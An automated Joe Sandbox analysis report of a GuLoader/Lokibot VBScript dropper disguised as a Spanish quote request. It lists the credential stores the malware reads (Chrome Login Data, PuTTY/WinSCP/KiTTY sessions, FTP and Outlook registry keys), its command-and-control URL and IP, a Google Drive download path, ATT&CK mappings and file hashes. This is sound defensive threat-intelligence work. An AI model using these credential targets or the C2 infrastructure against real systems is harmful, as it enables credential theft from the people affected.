                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8116, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

                Remote Access Functionality

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 8116, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		2
                Obfuscated Files or Information                		2
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		111
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		114
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)1
                Timestomp                		Security Account Manager111
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                Virtualization/Sandbox Evasion                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523153 Sample: Solicitud de presupuesto 09... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 30 drive.usercontent.google.com 2->30 32 drive.google.com 2->32 40 Multi AV Scanner detection for domain / URL 2->40 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 48 Writes to foreign memory regions 8->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 8->50 13 dxdiag.exe 1 82 8->13         started        18 conhost.exe 8->18         started        20 msiexec.exe 8->20         started        24 10 other processes 8->24 52 VBScript performs obfuscated calls to suspicious functions 11->52 54 Suspicious powershell command line found 11->54 56 Wscript starts Powershell (via cmd or directly) 11->56 58 2 other signatures 11->58 22 powershell.exe 14 18 11->22         started        process6 dnsIp7 34 137.184.191.215, 49709, 49710, 49711 PANDGUS United States 13->34 28 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 13->28 dropped 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->60 62 Tries to steal Mail credentials (via file / registry access) 13->62 64 Tries to harvest and steal ftp login credentials 13->64 68 2 other signatures 13->68 36 drive.usercontent.google.com 142.250.181.225, 443, 49701, 49708 GOOGLEUS United States 22->36 38 drive.google.com 142.250.185.142, 443, 49700, 49707 GOOGLEUS United States 22->38 66 Found suspicious powershell code related to unpacking or dynamic code loading 22->66 26 conhost.exe 22->26         started        file8 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs8%ReversingLabsWin32.Trojan.Generic
                Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs10%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                drive.usercontent.google.com1%VirustotalBrowse
                drive.google.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://drive.usercontent.google.com/1%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                http://137.184.191.215/index.php/1089910%VirustotalBrowse
                https://wordpress.org/documentation/article/faq-troubleshooting/0%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                https://drive.google.com/0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://w7icrosoft.com0%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                http://drive.usercontent.google.com1%VirustotalBrowse
                https://drive.google0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                		142.250.185.142
                		truefalseunknown
                drive.usercontent.google.com
                		142.250.181.225
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/10899trueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/10899xdxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://drive.usercontent.google.compowershell.exe, 00000008.00000002.1402272979.000001AB648C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000008.00000002.1402272979.000001AB63F65000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://drive.googPpowershell.exe, 00000008.00000002.1402272979.000001AB6488A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://wordpress.org/documentation/article/faq-troubleshooting/dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://drive.usercontent.google.com/dxdiag.exe, 00000019.00000002.2609487387.0000000007735000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://drive.google.compowershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://www.google.compowershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://drive.usercontent.googh(powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.google.com/dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://contoso.com/powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://drive.google.compowershell.exe, 00000008.00000002.1402272979.000001AB62E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB64866000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://drive.usercontent.google.compowershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore68powershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://apis.google.compowershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://w7icrosoft.compowershell.exe, 00000008.00000002.1468130265.000001AB7B230000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://drive.googledxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      142.250.181.225
                      		drive.usercontent.google.comUnited States
                      		15169GOOGLEUSfalse
                      142.250.185.142
                      		drive.google.comUnited States
                      		15169GOOGLEUSfalse
                      137.184.191.215
                      		unknownUnited States
                      		11003PANDGUStrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523153
                      Start date and time:2024-10-01 07:42:50 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 29s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:30
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
                      renamed because original name is a hash value
                      Original Sample Name:Solicitud de presupuesto 09-30-2024pdf.vbs
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winVBS@30/10@2/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 88%
                      • Number of executed functions: 71
                      • Number of non-executed functions: 15
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target dxdiag.exe, PID 8116 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      01:43:48API Interceptor76x Sleep call for process: powershell.exe modified
                      02:51:38API Interceptor25x Sleep call for process: dxdiag.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      137.184.191.215SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/039
                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899
                      ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/039
                      DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899
                      INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check.php?s=am9ntjjw
                      #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/check?post=073989953
                      U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215/index.php/10899

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      PANDGUSSOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                      • 155.120.253.229
                      PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215
                      https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeDGet hashmaliciousHTMLPhisherBrowse
                      • 137.184.252.128
                      INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 137.184.191.215

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eScanned Purchase List.vbsGet hashmaliciousUnknownBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      37f463bf4616ecd445d4a1937da06e19SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      file.exeGet hashmaliciousLodaRATBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      file.exeGet hashmaliciousXWorm, XmrigBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                      • 142.250.185.142
                      • 142.250.181.225
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 142.250.185.142
                      • 142.250.181.225

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):8003
                      Entropy (8bit):4.840877972214509
                      Encrypted:false
                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                      MD5:106D01F562D751E62B702803895E93E0
                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                      Malicious:false
